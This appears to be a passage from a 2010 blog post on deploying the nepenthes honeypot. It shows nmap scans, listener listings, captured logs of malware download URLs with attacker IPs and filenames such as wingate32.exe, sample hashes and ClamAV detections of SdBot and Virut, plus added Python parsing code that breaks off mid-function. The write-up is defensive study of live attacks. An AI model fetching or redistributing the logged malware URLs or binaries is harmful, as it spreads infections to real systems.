Before nepenthes
p/s: this is using default settings with minor configuration.
—————————————————-
salax@zulfiqar:~$ nmap 192.168.2.10
Starting Nmap 4.53 ( http://insecure.org ) at 2010-01-09 00:11 MYT
Interesting ports on 192.168.2.10:
Not shown: 1711 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
631/tcp open ipp
Nmap done: 1 IP address (1 host up) scanned in 0.075 seconds
———————————-
Firing up nepenthes:
salax@zulfiqar:~$ sudo /etc/init.d/nepenthes start
[sudo] password for salax:
Starting nepenthes: nepenthes.
——————————————————-
After nepenthes:
salax@zulfiqar:~$ nmap 192.168.2.10
Starting Nmap 4.53 ( http://insecure.org ) at 2010-01-09 00:11 MYT
Interesting ports on 192.168.2.10:
Not shown: 1690 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
42/tcp open nameserver
53/tcp open domain
80/tcp open http
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
143/tcp open imap
220/tcp open imap3
443/tcp open https
445/tcp open microsoft-ds
465/tcp open smtps
631/tcp open ipp
993/tcp open imaps
995/tcp open pop3s
1023/tcp open netvenuechat
1025/tcp open NFS-or-IIS
2105/tcp open eklogin
3372/tcp open msdtc
5000/tcp open UPnP
10000/tcp open snet-sensor-mgmt
17300/tcp open kuang2
Nmap done: 1 IP address (1 host up) scanned in 0.075 seconds
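To check that the honeypot changed the exposed surface exactly as intended, the following added Python (my example, not code from the post or from nepenthes) parses both scan reports, lists the ports nepenthes opened, confirms the two scans account for the same number of ports (printed rows plus the "Not shown" count), and points out the host's own services (ssh, DNS, CUPS) that remain reachable beside the decoys. The scan text is copied from the two reports above.

```python
import re

# Nmap's classic text report: a "PORT STATE SERVICE" table plus a
# "Not shown: N closed ports" line for every port it did not print.
PORT_RE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)")
NOT_SHOWN_RE = re.compile(r"^Not shown: (?P<n>\d+) \S+ ports")

# Both scans copied from the post (the fused "Nmap done" line split off).
BEFORE = """\
Not shown: 1711 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
631/tcp open ipp
Nmap done: 1 IP address (1 host up) scanned in 0.075 seconds
"""
AFTER = """\
Not shown: 1690 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
42/tcp open nameserver
53/tcp open domain
80/tcp open http
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
143/tcp open imap
220/tcp open imap3
443/tcp open https
445/tcp open microsoft-ds
465/tcp open smtps
631/tcp open ipp
993/tcp open imaps
995/tcp open pop3s
1023/tcp open netvenuechat
1025/tcp open NFS-or-IIS
2105/tcp open eklogin
3372/tcp open msdtc
5000/tcp open UPnP
10000/tcp open snet-sensor-mgmt
17300/tcp open kuang2
Nmap done: 1 IP address (1 host up) scanned in 0.075 seconds
"""


def parse_nmap(text):
    """Return (ports, not_shown): {'22/tcp': ('open', 'ssh'), ...} and the
    number of ports Nmap summarised instead of printing."""
    ports = {}
    not_shown = 0
    for raw in text.splitlines():
        line = raw.strip()
        m = PORT_RE.match(line)
        if m:
            ports[f"{m['port']}/{m['proto']}"] = (m["state"], m["service"])
            continue
        m = NOT_SHOWN_RE.match(line)
        if m:
            not_shown = int(m["n"])
    return ports, not_shown


def _port_number(port):
    return int(port.split("/", 1)[0])


def open_ports(scan):
    ports, _ = scan
    return {p for p, (state, _) in ports.items() if state == "open"}


def diff_scans(before, after):
    """Ports the honeypot opened, ports that vanished, the host's own services
    still reachable beside the decoys, and whether both scans cover the same
    number of ports (printed rows + 'Not shown' must agree, otherwise the two
    reports are not comparable)."""
    b, a = open_ports(before), open_ports(after)
    return {
        "opened": sorted(a - b, key=_port_number),
        "closed": sorted(b - a, key=_port_number),
        "host_services": sorted(a & b, key=_port_number),
        "totals_agree": len(before[0]) + before[1] == len(after[0]) + after[1],
    }


if __name__ == "__main__":
    d = diff_scans(parse_nmap(BEFORE), parse_nmap(AFTER))
    print(f"{len(d['opened'])} decoy ports opened: {', '.join(d['opened'])}")
    print("still exposed from the host itself:", ", ".join(d["host_services"]))
    print("scans comparable:", d["totals_agree"])
```

The "host_services" set is the one to think about before putting such a box on a public address: a real sshd and CUPS sitting among the decoys are the ports an attacker who fingerprints the host will take seriously.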
———————————————————————–
Listing open files with lsof shows the nepenthes listeners:
salax@zulfiqar:/etc/nepenthes$ sudo lsof -i | grep nepenthes
[sudo] password for salax:
nepenthes 7246 nepenthes 6u IPv4 29655 TCP *:smtp (LISTEN)
nepenthes 7246 nepenthes 7u IPv4 29656 TCP *:pop3 (LISTEN)
nepenthes 7246 nepenthes 8u IPv4 29657 TCP *:imap2 (LISTEN)
nepenthes 7246 nepenthes 9u IPv4 29658 TCP *:imap3 (LISTEN)
nepenthes 7246 nepenthes 10u IPv4 29659 TCP *:ssmtp (LISTEN)
nepenthes 7246 nepenthes 11u IPv4 29660 TCP *:imaps (LISTEN)
nepenthes 7246 nepenthes 12u IPv4 29661 TCP *:pop3s (LISTEN)
nepenthes 7246 nepenthes 13u IPv4 29662 TCP *:2745 (LISTEN)
nepenthes 7246 nepenthes 14u IPv4 29663 TCP *:6129 (LISTEN)
nepenthes 7246 nepenthes 15u IPv4 29664 TCP *:loc-srv (LISTEN)
nepenthes 7246 nepenthes 16u IPv4 29665 TCP *:microsoft-ds (LISTEN)
nepenthes 7246 nepenthes 17u IPv4 29666 TCP *:1025 (LISTEN)
nepenthes 7246 nepenthes 18u IPv4 29667 TCP *:ftp (LISTEN)
nepenthes 7246 nepenthes 19u IPv4 29668 TCP *:https (LISTEN)
nepenthes 7246 nepenthes 20u IPv4 29669 TCP *:17300 (LISTEN)
nepenthes 7246 nepenthes 21u IPv4 29670 TCP *:2103 (LISTEN)
nepenthes 7246 nepenthes 22u IPv4 29671 TCP *:eklogin (LISTEN)
nepenthes 7246 nepenthes 23u IPv4 29672 TCP *:2107 (LISTEN)
nepenthes 7246 nepenthes 24u IPv4 29673 TCP *:3372 (LISTEN)
nepenthes 7246 nepenthes 25u IPv4 29674 UDP *:ms-sql-m
nepenthes 7246 nepenthes 26u IPv4 29675 TCP *:3127 (LISTEN)
nepenthes 7246 nepenthes 27u IPv4 29676 TCP *:netbios-ssn (LISTEN)
nepenthes 7246 nepenthes 28u IPv4 29677 TCP *:3140 (LISTEN)
nepenthes 7246 nepenthes 29u IPv4 29678 TCP *:5554 (LISTEN)
nepenthes 7246 nepenthes 30u IPv4 29679 TCP *:1023 (LISTEN)
nepenthes 7246 nepenthes 31u IPv4 29680 TCP *:27347 (LISTEN)
nepenthes 7246 nepenthes 32u IPv4 29681 TCP *:5000 (LISTEN)
nepenthes 7246 nepenthes 33u IPv4 29682 TCP *:webmin (LISTEN)
nepenthes 7246 nepenthes 34u IPv4 29683 TCP *:nameserver (LISTEN)
nepenthes 7246 nepenthes 35u IPv4 29684 TCP *:www (LISTEN)
nepenthes 7246 nepenthes 36u IPv4 29685 TCP *:10002 (LISTEN)
——————————————————————-
Take a look in /var/log/nepenthes/logged_downloads:
salax@zulfiqar:/var/log/nepenthes$ cat logged_downloads
[2010-01-08T03:21:15] 60.48.72.2 -> 192.168.2.10 link://60.48.72.2:11965/qcxYEw==
[2010-01-08T03:23:37] 60.48.98.64 -> 192.168.2.10 ftp://a:a@60.48.98.64:11460/Win15763.exe
[2010-01-08T22:27:49] 60.47.49.168 -> 192.168.2.10 link://60.47.49.168:29913/GDAo+A==
[2010-01-09T21:59:29] 60.48.196.174 -> 192.168.2.10 ftp://1:1@0.0.0.0:5895/wint.exe
[2010-01-09T22:20:08] 60.167.120.190 -> 192.168.2.10 ftp://1:1@60.167.120.190:9495/ssms.exe
[2010-01-09T22:26:00] 60.56.171.98 -> 192.168.2.10 tftp://0.0.0.0/ssms.exe
[2010-01-09T22:31:08] 60.47.211.135 -> 192.168.2.10 link://60.47.211.135:57271/46juBw==
[2010-01-09T22:54:40] 60.48.196.174 -> 192.168.2.10 ftp://1:1@0.0.0.0:5895/wint.exe
[2010-01-09T23:20:02] 60.48.206.249 -> 192.168.2.10 ftp://1:1@60.48.206.249:31018/wingate32.exe
[2010-01-09T23:23:05] 60.53.58.190 -> 192.168.2.10 ftp://1:1@0.0.0.0:15639/WinSec.exe
[2010-01-09T23:42:31] 60.48.206.249 -> 192.168.2.10 link://60.48.206.249:50408/EWYNew==
[2010-01-10T11:48:14] 60.44.18.223 -> 192.168.2.10 blink://60.44.18.223:40579/GLJK+A==
[2010-01-10T12:10:59] 60.48.192.35 -> 192.168.2.10 blink://60.48.192.35:42750/GIAo+A==
[2010-01-10T12:21:05] 60.48.192.35 -> 192.168.2.10 blink://60.48.192.35:33106/GIAo+A==
[2010-01-10T12:22:13] 69.207.61.212 -> 192.168.2.10 http://74.77.18.116:4662/x.exe
[2010-01-10T12:31:20] 60.48.192.35 -> 192.168.2.10 blink://60.48.192.35:41373/GIAo+A==
[2010-01-10T13:13:55] 60.42.119.172 -> 192.168.2.10 blink://60.42.119.172:29703/mPKeAQ==
[2010-01-10T13:15:21] 60.43.40.208 -> 192.168.2.10 link://60.43.40.208:46158/OHwf/g==
[2010-01-11T00:36:28] 60.48.103.18 -> 192.168.2.10 ftp://1:1@60.48.103.18:62984/wingate32.exe
[2010-01-11T00:42:24] 60.36.30.127 -> 192.168.2.10 ftp://1:1@0.0.0.0:45513/ssms.exe
[2010-01-11T00:51:16] 60.48.221.25 -> 192.168.2.10 ftp://1:1@60.48.221.25:40959/wingate32.exe
[2010-01-11T00:56:31] 60.48.103.18 -> 192.168.2.10 ftp://1:1@60.48.103.18:62984/wingate32.exe
[2010-01-11T20:10:07] 60.48.245.153 -> 192.168.2.10 link://60.48.245.153:64395/EGYNAw==
[2010-01-11T20:15:19] 60.48.245.153 -> 192.168.2.10 ftp://1:1@0.0.0.0:44154/wingate32.exe
[2010-01-11T20:18:03] 60.249.204.192 -> 192.168.2.10 tftp://0.0.0.0/ssms.exe
[2010-01-11T20:24:11] 60.48.76.255 -> 192.168.2.10 link://60.48.76.255:51319/TzxtYQ==
[2010-01-11T21:22:43] 60.48.70.175 -> 192.168.2.10 ftp://x:x@60.48.70.175:27517/hqghumea.dll
[2010-01-11T21:37:35] 60.41.138.161 -> 192.168.2.10 link://60.41.138.161:35057/4/idCA==
[2010-01-11T21:51:23] 60.48.70.175 -> 192.168.2.10 ftp://x:x@60.48.70.175:27517/hqghumea.dll
[2010-01-11T21:51:35] 60.48.76.255 -> 192.168.2.10 link://60.48.76.255:51319/TzxtYQ==
[2010-01-11T22:00:17] 60.48.76.255 -> 192.168.2.10 link://60.48.76.255:51319/TzxtYQ==
[2010-01-11T22:10:43] 60.48.103.192 -> 192.168.2.10 creceive://60.48.103.192:24841/0
[2010-01-11T22:10:43] 60.48.103.192 -> 192.168.2.10 creceive://60.48.103.192:24841/0
[2010-01-11T22:14:19] 60.48.70.175 -> 192.168.2.10 ftp://x:x@60.48.70.175:27517/hqghumea.dll
[2010-01-11T22:16:52] 60.48.103.192 -> 192.168.2.10 ftp://1:1@60.48.103.192:28894/wingate32.exe
[2010-01-11T22:17:08] 60.48.103.192 -> 192.168.2.10 ftp://1:1@60.48.103.192:28894/wingate32.exe
[2010-01-11T22:17:41] 60.48.76.255 -> 192.168.2.10 link://60.48.76.255:51319/TzxtYQ==
[2010-01-11T22:27:00] 60.42.243.214 -> 192.168.2.10 link://60.42.243.214:48588/+RnAEQ==
[2010-01-11T22:35:05] 60.48.76.255 -> 192.168.2.10 link://60.48.76.255:51319/TzxtYQ==
[2010-01-11T22:52:24] 60.48.103.192 -> 192.168.2.10 ftp://1:1@60.48.103.192:28894/wingate32.exe
[2010-01-11T22:52:29] 60.48.76.255 -> 192.168.2.10 link://60.48.76.255:51319/TzxtYQ==
[2010-01-11T22:54:18] 60.48.103.192 -> 192.168.2.10 ftp://1:1@60.48.103.192:28894/wingate32.exe
[2010-01-11T23:01:11] 60.48.76.255 -> 192.168.2.10 link://60.48.76.255:51319/TzxtYQ==
[2010-01-11T23:07:43] 60.48.103.192 -> 192.168.2.10 creceive://60.48.103.192:13110/0
[2010-01-11T23:07:46] 60.48.103.192 -> 192.168.2.10 creceive://60.48.103.192:6464/0
[2010-01-11T23:15:04] 60.48.70.250 -> 192.168.2.10 ftp://1:1@60.48.70.250:23241/WinSec.exe
[2010-01-11T23:17:46] 60.48.70.175 -> 192.168.2.10 ftp://x:x@60.48.70.175:27517/hqghumea.dll
[2010-01-11T23:17:55] 60.48.103.192 -> 192.168.2.10 ftp://1:1@60.48.103.192:28894/wingate32.exe
[2010-01-11T23:18:34] 60.48.76.255 -> 192.168.2.10 link://60.48.76.255:51319/TzxtYQ==
[2010-01-11T23:21:10] 60.48.70.175 -> 192.168.2.10 ftp://x:x@60.48.70.175:27517/hqghumea.dll
[2010-01-13T03:19:57] 60.48.98.181 -> 192.168.2.10 ftp://a:a@0.0.0.0:3987/igxdfdfds.com
[2010-01-13T03:27:39] 60.48.189.130 -> 192.168.2.10 ftp://1:1@0.0.0.0:45506/wingate32.exe
[2010-01-13T03:28:57] 60.48.189.130 -> 192.168.2.10 ftp://1:1@0.0.0.0:45506/wingate32.exe
[2010-01-13T03:30:20] 60.48.216.206 -> 192.168.2.10 ftp://1:1@60.48.216.206:59898/wingate32.exe
[2010-01-13T03:32:24] 60.48.98.181 -> 192.168.2.10 ftp://a:a@60.48.98.181:4078/Win15763.exe
[2010-01-13T03:37:06] 60.48.98.181 -> 192.168.2.10 ftp://a:a@60.48.98.181:4078/Win15763.exe
[2010-01-13T03:37:54] 60.48.189.130 -> 192.168.2.10 ftp://1:1@0.0.0.0:45506/wingate32.exe
[2010-01-13T03:40:13] 60.48.98.181 -> 192.168.2.10 ftp://1:1@0.0.0.0:12506/wingate32.exe
[2010-01-13T03:43:58] 60.48.98.181 -> 192.168.2.10 ftp://1:1@0.0.0.0:12506/wingate32.exe
[2010-01-13T03:50:13] 60.48.189.130 -> 192.168.2.10 ftp://1:1@0.0.0.0:45506/wingate32.exe
[2010-01-13T03:50:21] 60.48.216.206 -> 192.168.2.10 ftp://1:1@60.48.216.206:59898/wingate32.exe
[2010-01-13T03:54:50] 60.48.216.206 -> 192.168.2.10 ftp://1:1@60.48.216.206:59898/wingate32.exe
[2010-01-13T04:02:31] 60.48.189.130 -> 192.168.2.10 ftp://1:1@0.0.0.0:45506/wingate32.exe
[2010-01-13T04:59:55] 60.48.216.206 -> 192.168.2.10 ftp://1:1@60.48.216.206:59898/wingate32.exe
[2010-01-13T05:07:36] 60.48.189.130 -> 192.168.2.10 ftp://1:1@0.0.0.0:45506/wingate32.exe
[2010-01-13T05:34:57] 60.48.189.130 -> 192.168.2.10 ftp://1:1@0.0.0.0:45506/wingate32.exe
[2010-01-13T05:48:38] 60.42.253.163 -> 192.168.2.10 link://60.42.253.163:54497/+BkAgw==
[2010-01-13T05:50:41] 60.48.89.89 -> 192.168.2.10 ftp://1:1@60.48.89.89:59451/wingate32.exe
[2010-01-13T05:57:08] 60.48.89.89 -> 192.168.2.10 tftp://60.48.89.89/runwin32.exe
[2010-01-13T05:57:30] 60.48.89.89 -> 192.168.2.10 ftp://1:1@60.48.89.89:59451/wingate32.exe
[2010-01-13T06:26:55] 60.48.189.130 -> 192.168.2.10 ftp://1:1@0.0.0.0:45506/wingate32.exe
[2010-01-13T06:27:07] 60.48.89.89 -> 192.168.2.10 tftp://0.0.0.0/runwin32.exe
[2010-01-13T06:27:30] 60.48.89.89 -> 192.168.2.10 ftp://1:1@0.0.0.0:59451/wingate32.exe
[2010-01-15T22:13:10] 124.12.75.2 -> 192.168.2.10 tftp://124.12.75.2/ssms.exe
—————————————————————————————
Also take a look in /var/log/nepenthes/logged_submissions:
salax@zulfiqar:/var/log/nepenthes$ cat logged_submissions
[2010-01-08T22:28:05] 60.47.49.168 -> 192.168.2.10 link://60.47.49.168:29913/GDAo+A== a881dd13336137c7c0a346a0e95a28cb
[2010-01-09T22:26:53] 60.56.171.98 -> 192.168.2.10 tftp://60.56.171.98:69/ssms.exe 98eb0fdadf8a403c013a8b1882ec986d
[2010-01-09T23:42:44] 60.48.206.249 -> 192.168.2.10 link://60.48.206.249:50408/EWYNew== f6a0747f321da6905d7f117b1a0491bc
[2010-01-10T11:48:15] 60.44.18.223 -> 192.168.2.10 blink://60.44.18.223:40579/GLJK+A== cf39a0e99513d242b516facffcf0149a
[2010-01-10T12:11:16] 60.48.192.35 -> 192.168.2.10 blink://60.48.192.35:42750/GIAo+A== fd0a67fb35667fabc7cba1be174a66a0
[2010-01-10T12:21:12] 60.48.192.35 -> 192.168.2.10 blink://60.48.192.35:33106/GIAo+A== fd0a67fb35667fabc7cba1be174a66a0
[2010-01-10T12:31:35] 60.48.192.35 -> 192.168.2.10 blink://60.48.192.35:41373/GIAo+A== fd0a67fb35667fabc7cba1be174a66a0
[2010-01-10T13:13:56] 60.42.119.172 -> 192.168.2.10 blink://60.42.119.172:29703/mPKeAQ== 6560050cb210e159c9cfb5a50fe6dd63
[2010-01-10T13:15:38] 60.43.40.208 -> 192.168.2.10 link://60.43.40.208:46158/OHwf/g== 714c1bf115fe97b19a4556d40de2fec1
[2010-01-11T20:18:48] 60.249.204.192 -> 192.168.2.10 tftp://60.249.204.192:69/ssms.exe fd28c5e1c38caa35bf5e1987e6167f4c
[2010-01-11T22:10:46] 60.48.103.192 -> 192.168.2.10 creceive://60.48.103.192:4921 7dc73bfa4d78284155dd5101991eeb34
[2010-01-11T22:10:46] 60.48.103.192 -> 192.168.2.10 creceive://60.48.103.192:4923 7dc73bfa4d78284155dd5101991eeb34
[2010-01-11T23:07:46] 60.48.103.192 -> 192.168.2.10 creceive://60.48.103.192:4735 7dc73bfa4d78284155dd5101991eeb34
[2010-01-11T23:07:48] 60.48.103.192 -> 192.168.2.10 creceive://60.48.103.192:3297 7dc73bfa4d78284155dd5101991eeb34
[2010-01-13T06:22:38] 60.48.89.89 -> 192.168.2.10 tftp://60.48.89.89/runwin32.exe 1eb2ae9acb444fd275f4ff1d55f4a54c
[2010-01-15T22:14:52] 124.12.75.2 -> 192.168.2.10 tftp://124.12.75.2/ssms.exe 1f8a826b2ae94daa78f6542ad4ef173b
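Both logs share one line shape, which makes them easy to triage programmatically. The following Python is an added example (mine, not part of the post or of nepenthes) that parses both files, breaks the downloads down by fetch method and payload name, counts URLs whose host is 0.0.0.0 or some third host rather than the attacker itself, and from the submissions maps each MD5 back to the IPs that delivered it and each filename to the distinct binaries seen under that name. Treating 0.0.0.0 as a shellcode placeholder for the attacking host is my assumption, not something the post states; the sample lines are copied from the two listings above.

```python
from __future__ import annotations

import re
from collections import Counter, defaultdict
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlparse

# One nepenthes log line: "[timestamp] attacker -> honeypot url", with a trailing
# MD5 of the fetched file in logged_submissions (absent in logged_downloads).
LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\]\s+(?P<src>\S+)\s+->\s+(?P<dst>\S+)\s+(?P<url>\S+)"
    r"(?:\s+(?P<md5>[0-9a-fA-F]{32}))?\s*$"
)

# Assumption (not stated in the post): a URL whose host is 0.0.0.0 is a shellcode
# placeholder, so the binary really has to be fetched from the attacking host.
PLACEHOLDER_HOST = "0.0.0.0"

# Lines copied from the post's logged_downloads and logged_submissions.
DOWNLOADS_SAMPLE = """\
[2010-01-08T03:21:15] 60.48.72.2 -> 192.168.2.10 link://60.48.72.2:11965/qcxYEw==
[2010-01-08T03:23:37] 60.48.98.64 -> 192.168.2.10 ftp://a:a@60.48.98.64:11460/Win15763.exe
[2010-01-09T21:59:29] 60.48.196.174 -> 192.168.2.10 ftp://1:1@0.0.0.0:5895/wint.exe
[2010-01-09T22:26:00] 60.56.171.98 -> 192.168.2.10 tftp://0.0.0.0/ssms.exe
[2010-01-10T12:22:13] 69.207.61.212 -> 192.168.2.10 http://74.77.18.116:4662/x.exe
[2010-01-11T00:36:28] 60.48.103.18 -> 192.168.2.10 ftp://1:1@60.48.103.18:62984/wingate32.exe
[2010-01-11T22:10:43] 60.48.103.192 -> 192.168.2.10 creceive://60.48.103.192:24841/0
[2010-01-13T05:57:08] 60.48.89.89 -> 192.168.2.10 tftp://60.48.89.89/runwin32.exe
"""
SUBMISSIONS_SAMPLE = """\
[2010-01-09T22:26:53] 60.56.171.98 -> 192.168.2.10 tftp://60.56.171.98:69/ssms.exe 98eb0fdadf8a403c013a8b1882ec986d
[2010-01-10T12:11:16] 60.48.192.35 -> 192.168.2.10 blink://60.48.192.35:42750/GIAo+A== fd0a67fb35667fabc7cba1be174a66a0
[2010-01-10T12:21:12] 60.48.192.35 -> 192.168.2.10 blink://60.48.192.35:33106/GIAo+A== fd0a67fb35667fabc7cba1be174a66a0
[2010-01-11T22:10:46] 60.48.103.192 -> 192.168.2.10 creceive://60.48.103.192:4921 7dc73bfa4d78284155dd5101991eeb34
[2010-01-15T22:14:52] 124.12.75.2 -> 192.168.2.10 tftp://124.12.75.2/ssms.exe 1f8a826b2ae94daa78f6542ad4ef173b
"""


@dataclass(frozen=True)
class Event:
    ts: str
    src: str
    dst: str
    scheme: str          # ftp, tftp, http, link, blink, creceive
    host: str
    port: Optional[int]
    filename: str        # last path component; for link:// it is the base64 key
    md5: Optional[str]


def parse_line(line: str) -> Optional[Event]:
    """Parse one log line; None for blank or malformed lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    u = urlparse(m["url"])  # splits host:port for unknown schemes as well
    return Event(
        ts=m["ts"], src=m["src"], dst=m["dst"],
        scheme=u.scheme, host=u.hostname or "", port=u.port,
        filename=u.path.rsplit("/", 1)[-1],
        md5=m["md5"].lower() if m["md5"] else None,
    )


def parse_log(text: str) -> list[Event]:
    return [e for e in map(parse_line, text.splitlines()) if e is not None]


def summarize(events: list[Event]) -> dict:
    """Triage counters: fetch methods, payload names, URLs that do not point at
    the attacker itself, and the number of distinct attackers seen."""
    return {
        "by_scheme": Counter(e.scheme for e in events),
        "by_filename": Counter(e.filename for e in events if e.filename),
        "placeholder_host": sum(e.host == PLACEHOLDER_HOST for e in events),
        "third_party_host": sum(e.host not in (e.src, PLACEHOLDER_HOST) for e in events),
        "distinct_sources": len({e.src for e in events}),
    }


def sources_by_hash(events: list[Event]) -> dict[str, list[str]]:
    """MD5 -> sorted attacker IPs that delivered that exact binary."""
    out: dict[str, set[str]] = defaultdict(set)
    for e in events:
        if e.md5:
            out[e.md5].add(e.src)
    return {h: sorted(s) for h, s in out.items()}


def hashes_by_filename(events: list[Event]) -> dict[str, list[str]]:
    """Filename -> distinct MD5s seen under that name (same name, different binary)."""
    out: dict[str, set[str]] = defaultdict(set)
    for e in events:
        if e.md5 and e.filename:
            out[e.filename].add(e.md5)
    return {f: sorted(s) for f, s in out.items()}


if __name__ == "__main__":
    print(summarize(parse_log(DOWNLOADS_SAMPLE)))
    for name, hashes in hashes_by_filename(parse_log(SUBMISSIONS_SAMPLE)).items():
        if len(hashes) > 1:
            print(f"{name}: {len(hashes)} different binaries under one name")
```

Two things the counters make visible that the raw listing hides: ssms.exe arrives as more than one distinct binary, so filename alone is a poor identifier, and the http:// entry points at a host other than the attacker, which is a separate download server worth tracking on its own.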
—————————————————————————————————————-
I looked into the binaries stored:
salax@zulfiqar:/var/lib/nepenthes/binaries$ ls
1eb2ae9acb444fd275f4ff1d55f4a54c 714c1bf115fe97b19a4556d40de2fec1 a881dd13336137c7c0a346a0e95a28cb fd0a67fb35667fabc7cba1be174a66a0
1f8a826b2ae94daa78f6542ad4ef173b 7dc73bfa4d78284155dd5101991eeb34 cf39a0e99513d242b516facffcf0149a fd28c5e1c38caa35bf5e1987e6167f4c
6560050cb210e159c9cfb5a50fe6dd63 98eb0fdadf8a403c013a8b1882ec986d f6a0747f321da6905d7f117b1a0491bc
——————————————————————————————
And I've got lots of hexdumps:
salax@zulfiqar:/var/lib/nepenthes/hexdumps$ ls
03040d7e4a4b43a51e16e23e8db372cc.bin
03b7c83b1097ec2103457238292d2c64.bin
047508ec910bbdd22bbd5b57735653cc.bin
0970bdd79407182c9b4528ea09482766.bin
0b246cefe406d265e33336b5614f03b8.bin
0bdbf63d3280cc4148dc431ee8ff9e67.bin
0cfc77783bc087dfdbc93eb848434785.bin
0e260b4030f9e03af889964cf08f1c31.bin
2b3ae3f7588a4f5598c35ccf85c57038.bin
2bed2846c40be4d0b54bd8e6570f5d65.bin
f9dc4a724a268dc50f599d91414a25a8.bin
2f25328714f52ceeb150474f9bd41ca3.bin
fc5752c2b644cf41132beac523653d6f.bin
32389a3b6d15c6b658c8c0ad0869e617.bin
33103e04b2b192f40a1a78091bb7fe5a.bin
fff4bb5b930ca56719bea26e22152165.bin
34557adc8990ee198c75a6446916f9fc.bin
——8<------------------------------------8<---------------------cutted-----8<
————————————————————————————————————————
Then, scanning using ClamAV:
salax@zulfiqar:/var/lib/nepenthes$ clamscan binaries/
LibClamAV Warning: **************************************************
LibClamAV Warning: *** The virus database is older than 7 days! ***
LibClamAV Warning: *** Please update it as soon as possible. ***
LibClamAV Warning: **************************************************
LibClamAV Warning: ***********************************************************
LibClamAV Warning: *** This version of the ClamAV engine is outdated. ***
LibClamAV Warning: *** DON’T PANIC! Read http://www.clamav.net/support/faq ***
LibClamAV Warning: ***********************************************************
binaries/fd0a67fb35667fabc7cba1be174a66a0: OK
binaries/cf39a0e99513d242b516facffcf0149a: OK
binaries/714c1bf115fe97b19a4556d40de2fec1: W32.Virut.sa FOUND
binaries/7dc73bfa4d78284155dd5101991eeb34: Trojan.SdBot-730 FOUND
binaries/1f8a826b2ae94daa78f6542ad4ef173b: Trojan.SdBot-4763 FOUND
binaries/fd28c5e1c38caa35bf5e1987e6167f4c: Trojan.SdBot-4763 FOUND
binaries/f6a0747f321da6905d7f117b1a0491bc: OK
binaries/98eb0fdadf8a403c013a8b1882ec986d: Trojan.SdBot-4763 FOUND
binaries/a881dd13336137c7c0a346a0e95a28cb: W32.Virut-17 FOUND
binaries/1eb2ae9acb444fd275f4ff1d55f4a54c: OK
binaries/6560050cb210e159c9cfb5a50fe6dd63: OK
binaries/df51e3310ef609e908a6b487a28ac068: Trojan.SdBot-4763 FOUND
----------- SCAN SUMMARY -----------
Known viruses: 572978
Engine version: 0.94.2
Scanned directories: 1
Scanned files: 12
Infected files: 7
Data scanned: 1.30 MB
Time: 2.564 sec (0 m 2 s)
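A practitioner wants the clamscan verdicts joined back to the submissions and sanity-checked against the summary block, and wants the stale-database warning to count for something, since an OK from week-old signatures is weak evidence. This added Python (mine, not the post's and not part of ClamAV) parses the output above, groups detections by family, verifies that the summary counts match the per-file lines, flags the stale database, and attributes each detected hash to the source IPs recorded in logged_submissions (a dict read off the listing above; df51... has no submission entry on the page, so it comes back unattributed).

```python
import re
from collections import Counter

# clamscan prints one "<path>: OK" or "<path>: <signature> FOUND" line per file,
# "LibClamAV Warning:" lines, and a "SCAN SUMMARY" block of "Key: value" rows.
RESULT_RE = re.compile(r"^(?P<path>\S+): (?:(?P<sig>.+) FOUND|OK)$")
SUMMARY_RE = re.compile(r"^(?P<key>[A-Za-z ]+): (?P<val>.+)$")

# Copied from the post (warning banner trimmed, summary separator on its own line).
CLAMSCAN_OUTPUT = """\
LibClamAV Warning: *** The virus database is older than 7 days! ***
LibClamAV Warning: *** Please update it as soon as possible. ***
LibClamAV Warning: *** This version of the ClamAV engine is outdated. ***
binaries/fd0a67fb35667fabc7cba1be174a66a0: OK
binaries/cf39a0e99513d242b516facffcf0149a: OK
binaries/714c1bf115fe97b19a4556d40de2fec1: W32.Virut.sa FOUND
binaries/7dc73bfa4d78284155dd5101991eeb34: Trojan.SdBot-730 FOUND
binaries/1f8a826b2ae94daa78f6542ad4ef173b: Trojan.SdBot-4763 FOUND
binaries/fd28c5e1c38caa35bf5e1987e6167f4c: Trojan.SdBot-4763 FOUND
binaries/f6a0747f321da6905d7f117b1a0491bc: OK
binaries/98eb0fdadf8a403c013a8b1882ec986d: Trojan.SdBot-4763 FOUND
binaries/a881dd13336137c7c0a346a0e95a28cb: W32.Virut-17 FOUND
binaries/1eb2ae9acb444fd275f4ff1d55f4a54c: OK
binaries/6560050cb210e159c9cfb5a50fe6dd63: OK
binaries/df51e3310ef609e908a6b487a28ac068: Trojan.SdBot-4763 FOUND
----------- SCAN SUMMARY -----------
Known viruses: 572978
Engine version: 0.94.2
Scanned directories: 1
Scanned files: 12
Infected files: 7
Data scanned: 1.30 MB
Time: 2.564 sec (0 m 2 s)
"""

# MD5 -> delivering IPs, read off the post's logged_submissions listing.
HASH_SOURCES = {
    "a881dd13336137c7c0a346a0e95a28cb": ["60.47.49.168"],
    "98eb0fdadf8a403c013a8b1882ec986d": ["60.56.171.98"],
    "714c1bf115fe97b19a4556d40de2fec1": ["60.43.40.208"],
    "fd28c5e1c38caa35bf5e1987e6167f4c": ["60.249.204.192"],
    "7dc73bfa4d78284155dd5101991eeb34": ["60.48.103.192"],
    "1f8a826b2ae94daa78f6542ad4ef173b": ["124.12.75.2"],
}


def parse_clamscan(text):
    """Return (findings, summary, warnings); findings maps path -> signature, or None for OK."""
    findings, summary, warnings = {}, {}, []
    in_summary = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("LibClamAV Warning:"):
            msg = line[len("LibClamAV Warning:"):].strip(" *")
            if msg:
                warnings.append(msg)
            continue
        if "SCAN SUMMARY" in line:
            in_summary = True
            continue
        if in_summary:
            m = SUMMARY_RE.match(line)
            if m:
                summary[m["key"]] = m["val"]
            continue
        m = RESULT_RE.match(line)
        if m:
            findings[m["path"]] = m["sig"]
    return findings, summary, warnings


def family(sig):
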